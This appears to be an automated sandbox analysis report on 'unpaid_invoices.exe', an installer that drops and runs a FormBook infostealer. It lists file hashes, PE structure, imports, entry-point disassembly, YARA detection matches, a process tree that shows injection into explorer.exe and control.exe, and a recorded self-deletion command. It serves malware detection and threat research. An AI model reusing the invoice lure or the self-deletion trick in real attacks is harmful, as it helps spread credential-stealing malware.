            MD5:66039B0CB9E9C76FD4CFEA6E9D2B130C
            SHA1:ABEDE731EEA86A7FB5D05A9533B4F3F42EAC3189
            SHA-256:D46D7D1FC237E3BF7672757A5872A663B7B9227F9A90A76EE3D45457E7C39E0B
            SHA-512:BC9A1282FD8A16D573C3A97CC2BADADC72594EA5400A042D553FE0D7E8E9D53085BF1AE0BB4BF2CD49C0C56DF8BAA82619FA028135BE0B384F13715838E53A2B
            Malicious:true
            Antivirus:
            • Antivirus: Virustotal, Detection: 35%, Browse
            Reputation:low
            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
            Entropy (8bit):6.919498098221858
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:unpaid_invoices.exe
            File size:385563
            MD5:fa28e3d61ae49fda627abfc78ca84dea
            SHA1:7ecf93e5d4a2873a10510d007b33b4c3460b29d5
            SHA256:a7162eb3744c8a0629f9c3967700bf4e015e807340c4e1be3327011a637108c4
            SHA512:0f747377e6b5c776d69b160cc75d02450f7b514c8136bfd3695d8a6a0198340f767c857847e5aa1dbac7a3769351d2eb4fff18d5278a229dc428b32640812489
            SSDEEP:6144:OOtIeWOzdoSik7zuDnTpxRy04Q7zoMmy7WPFmMQZfQcTWlvr0YHSN+w4FIG4qHay:OOaOzdoSP7yDlxBv73jSPgn61r0YHBFz
            TLSH:FB84F151F3049059EDAB63B3443FAE324A476E3E9AB4A21B034D75717FF3242552BE06
            Icon Hash:00000023490d3000
            Entrypoint:0x403646
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x614F9AA9 [Sat Sep 25 21:54:49 2021 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:61259b55b8912888e90f516ca08dc514
            Instruction
            push ebp
            mov ebp, esp
            sub esp, 000003F4h
            push ebx
            push esi
            push edi
            push 00000020h
            pop edi
            xor ebx, ebx
            push 00008001h
            mov dword ptr [ebp-14h], ebx
            mov dword ptr [ebp-04h], 0040A230h
            mov dword ptr [ebp-10h], ebx
            call dword ptr [004080C8h]
            mov esi, dword ptr [004080CCh]
            lea eax, dword ptr [ebp-00000140h]
            push eax
            mov dword ptr [ebp-0000012Ch], ebx
            mov dword ptr [ebp-2Ch], ebx
            mov dword ptr [ebp-28h], ebx
            mov dword ptr [ebp-00000140h], 0000011Ch
            call esi
            test eax, eax
            jne 00007F1738CCC0CAh
            lea eax, dword ptr [ebp-00000140h]
            mov dword ptr [ebp-00000140h], 00000114h
            push eax
            call esi
            mov ax, word ptr [ebp-0000012Ch]
            mov ecx, dword ptr [ebp-00000112h]
            sub ax, 00000053h
            add ecx, FFFFFFD0h
            neg ax
            sbb eax, eax
            mov byte ptr [ebp-26h], 00000004h
            not eax
            and eax, ecx
            mov word ptr [ebp-2Ch], ax
            cmp dword ptr [ebp-0000013Ch], 0Ah
            jnc 00007F1738CCC09Ah
            and word ptr [ebp-00000132h], 0000h
            mov eax, dword ptr [ebp-00000134h]
            movzx ecx, byte ptr [ebp-00000138h]
            mov dword ptr [007A8B58h], eax
            xor eax, eax
            mov ah, byte ptr [ebp-0000013Ch]
            movzx eax, ax
            or eax, ecx
            xor ecx, ecx
            mov ch, byte ptr [ebp-2Ch]
            movzx ecx, cx
            shl eax, 10h
            or eax, ecx
            Programming Language:
            • [EXP] VC++ 6.0 SP5 build 8804
            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b9000 | 0x1e758 | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x1000 | 0x67c4 | 0x6800 | False | 0.675180288462 | data | 6.49518266675 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .rdata | 0x8000 | 0x139a | 0x1400 | False | 0.4498046875 | data | 5.14106681717 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data | 0xa000 | 0x39ebb8 | 0x600 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .ndata | 0x3a9000 | 0x10000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .rsrc | 0x3b9000 | 0x1e758 | 0x1e800 | False | 0.269339139344 | data | 3.47813772523 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            Name | RVA | Size | Type | Language | Country
            RT_ICON | 0x3b9280 | 0x10828 | data | English | United States
            RT_ICON | 0x3c9aa8 | 0x59ac | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
            RT_ICON | 0x3cf458 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294967295, next used block 4294967295 | English | United States
            RT_ICON | 0x3d3680 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294967295, next used block 4294967295 | English | United States
            RT_ICON | 0x3d5c28 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294967295, next used block 4294967295 | English | United States
            RT_ICON | 0x3d6cd0 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
            RT_DIALOG | 0x3d7138 | 0x100 | data | English | United States
            RT_DIALOG | 0x3d7238 | 0x11c | data | English | United States
            RT_DIALOG | 0x3d7358 | 0x60 | data | English | United States
            RT_GROUP_ICON | 0x3d73b8 | 0x5a | data | English | United States
            RT_MANIFEST | 0x3d7418 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
            DLL | Import
            ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
            SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
            ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
            COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
            USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
            GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
            KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
            Language of compilation system | Country where language is spoken
            English | United States
            No network behavior found

            Target ID:0
            Start time:11:31:17
            Start date:14/05/2022
            Path:C:\Users\user\Desktop\unpaid_invoices.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\unpaid_invoices.exe"
            Imagebase:0x400000
            File size:385563 bytes
            MD5 hash:FA28E3D61AE49FDA627ABFC78CA84DEA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            Target ID:1
            Start time:11:31:18
            Start date:14/05/2022
            Path:C:\Users\user\AppData\Local\Temp\ronkhfyq.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq
            Imagebase:0xe10000
            File size:80384 bytes
            MD5 hash:66039B0CB9E9C76FD4CFEA6E9D2B130C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Antivirus matches:
            • Detection: 35%, Virustotal, Browse
            Reputation:low

            Target ID:2
            Start time:11:31:19
            Start date:14/05/2022
            Path:C:\Users\user\AppData\Local\Temp\ronkhfyq.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq
            Imagebase:0xe10000
            File size:80384 bytes
            MD5 hash:66039B0CB9E9C76FD4CFEA6E9D2B130C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low

            Target ID:5
            Start time:11:31:25
            Start date:14/05/2022
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\Explorer.EXE
            Imagebase:0x7ff6f3b00000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:high

            Target ID:17
            Start time:11:31:50
            Start date:14/05/2022
            Path:C:\Windows\SysWOW64\control.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\control.exe
            Imagebase:0x7ff7338d0000
            File size:114688 bytes
            MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:moderate

            Target ID:18
            Start time:11:31:54
            Start date:14/05/2022
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:/c del "C:\Users\user\AppData\Local\Temp\ronkhfyq.exe"
            Imagebase:0x1190000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Target ID:19
            Start time:11:31:55
            Start date:14/05/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff647620000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Target ID:27
            Start time:11:32:37
            Start date:14/05/2022
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
            Imagebase:0x7ff6f3b00000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

              Execution Graph

              Execution Coverage:16.5%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:16.3%
              Total number of Nodes:1372
              Total number of Limit Nodes:22
lstrcpynW 3951->3954 3954->3952 3955 401563 3956 402ba4 3955->3956 3959 4065b5 wsprintfW 3956->3959 3958 402ba9 3959->3958 3960 401968 3961 402d84 17 API calls 3960->3961 3962 40196f 3961->3962 3963 402d84 17 API calls 3962->3963 3964 40197c 3963->3964 3965 402da6 17 API calls 3964->3965 3966 401993 lstrlenW 3965->3966 3968 4019a4 3966->3968 3967 4019e5 3968->3967 3972 40666e lstrcpynW 3968->3972 3970 4019d5 3970->3967 3971 4019da lstrlenW 3970->3971 3971->3967 3972->3970 3973 40166a 3974 402da6 17 API calls 3973->3974 3975 401670 3974->3975 3976 4069a4 2 API calls 3975->3976 3977 401676 3976->3977 3978 402aeb 3979 402d84 17 API calls 3978->3979 3981 402af1 3979->3981 3980 40292e 3981->3980 3982 4066ab 17 API calls 3981->3982 3982->3980 3983 4026ec 3984 402d84 17 API calls 3983->3984 3985 4026fb 3984->3985 3986 402745 ReadFile 3985->3986 3987 4061e1 ReadFile 3985->3987 3989 402785 MultiByteToWideChar 3985->3989 3990 40283a 3985->3990 3992 4027ab SetFilePointer MultiByteToWideChar 3985->3992 3993 40284b 3985->3993 3995 402838 3985->3995 3996 40623f SetFilePointer 3985->3996 3986->3985 3986->3995 3987->3985 3989->3985 4005 4065b5 wsprintfW 3990->4005 3992->3985 3994 40286c SetFilePointer 3993->3994 3993->3995 3994->3995 3997 40625b 3996->3997 4004 406273 3996->4004 3998 4061e1 ReadFile 3997->3998 3999 406267 3998->3999 4000 4062a4 SetFilePointer 3999->4000 4001 40627c SetFilePointer 3999->4001 3999->4004 4000->4004 4001->4000 4002 406287 4001->4002 4003 406210 WriteFile 4002->4003 4003->4004 4004->3985 4005->3995 3718 40176f 3719 402da6 17 API calls 3718->3719 3720 401776 3719->3720 3721 401796 3720->3721 3722 40179e 3720->3722 3757 40666e lstrcpynW 3721->3757 3758 40666e lstrcpynW 3722->3758 3725 40179c 3729 4068f5 5 API calls 3725->3729 3726 4017a9 3727 405f3d 3 API calls 3726->3727 3728 4017af lstrcatW 3727->3728 3728->3725 3745 4017bb 3729->3745 3730 4069a4 2 API calls 3730->3745 3731 406139 2 API calls 3731->3745 3733 4017cd CompareFileTime 3733->3745 3734 
40188d 3736 4056d0 24 API calls 3734->3736 3735 401864 3737 4056d0 24 API calls 3735->3737 3746 401879 3735->3746 3739 401897 3736->3739 3737->3746 3738 40666e lstrcpynW 3738->3745 3740 403377 40 API calls 3739->3740 3741 4018aa 3740->3741 3742 4018be SetFileTime 3741->3742 3744 4018d0 FindCloseChangeNotification 3741->3744 3742->3744 3743 4066ab 17 API calls 3743->3745 3744->3746 3747 4018e1 3744->3747 3745->3730 3745->3731 3745->3733 3745->3734 3745->3735 3745->3738 3745->3743 3753 405cce MessageBoxIndirectW 3745->3753 3756 40615e GetFileAttributesW CreateFileW 3745->3756 3748 4018e6 3747->3748 3749 4018f9 3747->3749 3751 4066ab 17 API calls 3748->3751 3750 4066ab 17 API calls 3749->3750 3752 401901 3750->3752 3754 4018ee lstrcatW 3751->3754 3755 405cce MessageBoxIndirectW 3752->3755 3753->3745 3754->3752 3755->3746 3756->3745 3757->3725 3758->3726 4006 401a72 4007 402d84 17 API calls 4006->4007 4008 401a7b 4007->4008 4009 402d84 17 API calls 4008->4009 4010 401a20 4009->4010 4011 401573 4012 401583 ShowWindow 4011->4012 4013 40158c 4011->4013 4012->4013 4014 402c2a 4013->4014 4015 40159a ShowWindow 4013->4015 4015->4014 4016 404a74 4017 404a84 4016->4017 4018 404aaa 4016->4018 4019 4045ca 18 API calls 4017->4019 4020 404631 8 API calls 4018->4020 4021 404a91 SetDlgItemTextW 4019->4021 4022 404ab6 4020->4022 4021->4018 4023 4023f4 4024 402da6 17 API calls 4023->4024 4025 402403 4024->4025 4026 402da6 17 API calls 4025->4026 4027 40240c 4026->4027 4028 402da6 17 API calls 4027->4028 4029 402416 GetPrivateProfileStringW 4028->4029 4030 4014f5 SetForegroundWindow 4031 402c2a 4030->4031 4032 401ff6 4033 402da6 17 API calls 4032->4033 4034 401ffd 4033->4034 4035 4069a4 2 API calls 4034->4035 4036 402003 4035->4036 4038 402014 4036->4038 4039 4065b5 wsprintfW 4036->4039 4039->4038 4040 401b77 4041 402da6 17 API calls 4040->4041 4042 401b7e 4041->4042 4043 402d84 17 API calls 4042->4043 4044 401b87 wsprintfW 4043->4044 4045 402c2a 4044->4045 4046 40167b 4047 402da6 17 
API calls 4046->4047 4048 401682 4047->4048 4049 402da6 17 API calls 4048->4049 4050 40168b 4049->4050 4051 402da6 17 API calls 4050->4051 4052 401694 MoveFileW 4051->4052 4053 4016a7 4052->4053 4059 4016a0 4052->4059 4054 4069a4 2 API calls 4053->4054 4055 4022f6 4053->4055 4057 4016b6 4054->4057 4056 401423 24 API calls 4056->4055 4057->4055 4058 40642e 36 API calls 4057->4058 4058->4059 4059->4056 4060 4019ff 4061 402da6 17 API calls 4060->4061 4062 401a06 4061->4062 4063 402da6 17 API calls 4062->4063 4064 401a0f 4063->4064 4065 401a16 lstrcmpiW 4064->4065 4066 401a28 lstrcmpW 4064->4066 4067 401a1c 4065->4067 4066->4067 4068 4022ff 4069 402da6 17 API calls 4068->4069 4070 402305 4069->4070 4071 402da6 17 API calls 4070->4071 4072 40230e 4071->4072 4073 402da6 17 API calls 4072->4073 4074 402317 4073->4074 4075 4069a4 2 API calls 4074->4075 4076 402320 4075->4076 4077 402331 lstrlenW lstrlenW 4076->4077 4078 402324 4076->4078 4080 4056d0 24 API calls 4077->4080 4079 4056d0 24 API calls 4078->4079 4082 40232c 4078->4082 4079->4082 4081 40236f SHFileOperationW 4080->4081 4081->4078 4081->4082 4083 401000 4084 401037 BeginPaint GetClientRect 4083->4084 4085 40100c DefWindowProcW 4083->4085 4086 4010f3 4084->4086 4090 401179 4085->4090 4088 401073 CreateBrushIndirect FillRect DeleteObject 4086->4088 4089 4010fc 4086->4089 4088->4086 4091 401102 CreateFontIndirectW 4089->4091 4092 401167 EndPaint 4089->4092 4091->4092 4093 401112 6 API calls 4091->4093 4092->4090 4093->4092 4094 404700 lstrcpynW lstrlenW 4095 401d81 4096 401d94 GetDlgItem 4095->4096 4097 401d87 4095->4097 4100 401d8e 4096->4100 4098 402d84 17 API calls 4097->4098 4098->4100 4099 401dd5 GetClientRect LoadImageW SendMessageW 4103 401e33 4099->4103 4105 401e3f 4099->4105 4100->4099 4101 402da6 17 API calls 4100->4101 4101->4099 4104 401e38 DeleteObject 4103->4104 4103->4105 4104->4105 4106 401503 4107 40150b 4106->4107 4109 40151e 4106->4109 4108 402d84 17 API calls 4107->4108 4108->4109 4110 402383 
4111 40238a 4110->4111 4113 40239d 4110->4113 4112 4066ab 17 API calls 4111->4112 4114 402397 4112->4114 4115 405cce MessageBoxIndirectW 4114->4115 4115->4113 4116 402c05 SendMessageW 4117 402c1f InvalidateRect 4116->4117 4118 402c2a 4116->4118 4117->4118 4119 404789 4121 4048bb 4119->4121 4122 4047a1 4119->4122 4120 404925 4123 4049ef 4120->4123 4124 40492f GetDlgItem 4120->4124 4121->4120 4121->4123 4130 4048f6 GetDlgItem SendMessageW 4121->4130 4125 4045ca 18 API calls 4122->4125 4129 404631 8 API calls 4123->4129 4126 4049b0 4124->4126 4127 404949 4124->4127 4128 404808 4125->4128 4126->4123 4133 4049c2 4126->4133 4127->4126 4132 40496f SendMessageW LoadCursorW SetCursor 4127->4132 4131 4045ca 18 API calls 4128->4131 4143 4049ea 4129->4143 4152 4045ec EnableWindow 4130->4152 4136 404815 CheckDlgButton 4131->4136 4156 404a38 4132->4156 4138 4049d8 4133->4138 4139 4049c8 SendMessageW 4133->4139 4135 404920 4153 404a14 4135->4153 4150 4045ec EnableWindow 4136->4150 4138->4143 4144 4049de SendMessageW 4138->4144 4139->4138 4144->4143 4145 404833 GetDlgItem 4151 4045ff SendMessageW 4145->4151 4147 404849 SendMessageW 4148 404866 GetSysColor 4147->4148 4149 40486f SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4147->4149 4148->4149 4149->4143 4150->4145 4151->4147 4152->4135 4154 404a22 4153->4154 4155 404a27 SendMessageW 4153->4155 4154->4155 4155->4120 4159 405c94 ShellExecuteExW 4156->4159 4158 40499e LoadCursorW SetCursor 4158->4126 4159->4158 4160 40248a 4161 402da6 17 API calls 4160->4161 4162 40249c 4161->4162 4163 402da6 17 API calls 4162->4163 4164 4024a6 4163->4164 4177 402e36 4164->4177 4167 4024de 4168 4024ea 4167->4168 4172 402d84 17 API calls 4167->4172 4173 402509 RegSetValueExW 4168->4173 4174 403377 40 API calls 4168->4174 4169 40292e 4170 402da6 17 API calls 4171 4024d4 lstrlenW 4170->4171 4171->4167 4172->4168 4175 40251f RegCloseKey 4173->4175 4174->4173 4175->4169 4178 402e51 4177->4178 4181 406509 4178->4181 4182 406518 4181->4182 
